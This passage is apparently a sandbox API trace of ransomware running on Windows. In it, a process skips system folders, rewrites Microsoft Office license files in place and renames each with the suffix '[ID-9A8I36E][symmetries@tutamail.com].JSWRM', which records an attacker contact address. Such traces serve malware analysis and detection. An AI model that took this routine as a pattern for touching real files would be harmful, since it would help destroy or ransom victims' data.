[0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0105.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0105.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0105.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.575] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0105.575] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0105.575] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0105.582] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.582] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0105.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.582] CloseHandle (hObject=0x45c) returned 1 [0105.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0105.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0105.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0105.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0105.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0105.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0105.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.583] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe66c1465, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe66c1465, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6949c74, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial2-pl.xrm-ms", cAlternateFileName="O376CD~1.XRM")) returned 1 [0105.583] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2=".") returned 1 [0105.583] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="..") returned 1 [0105.583] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="...") returned 1 [0105.583] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="windows") returned -1 [0105.584] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="recovery") returned -1 [0105.584] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.584] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.584] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.584] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.584] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-pl.xrm-ms", lpString2="msocache") returned 1 [0105.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0105.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0105.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0105.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0105.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.585] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0105.585] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.585] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.588] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.588] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.588] CloseHandle (hObject=0x45c) returned 1 [0105.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0105.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0105.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0105.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0105.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0105.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0105.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.590] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe664edb3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe664edb3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe68d7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial2-ppd.xrm-ms", cAlternateFileName="O3A4A6~1.XRM")) returned 1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2=".") returned 1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="..") returned 1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="...") returned 1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="windows") returned -1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.590] lstrcmpiW (lpString1="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial2-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0105.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0105.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0105.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.591] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24369) returned 1 [0105.591] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24c1d0 [0105.591] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f30, lpOverlapped=0x0) returned 1 [0105.595] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.595] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f30, lpOverlapped=0x0) returned 1 [0105.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.595] CloseHandle (hObject=0x45c) returned 1 [0105.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0105.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0105.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0105.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0105.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0105.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0105.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0105.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0105.597] HeapFree (in: 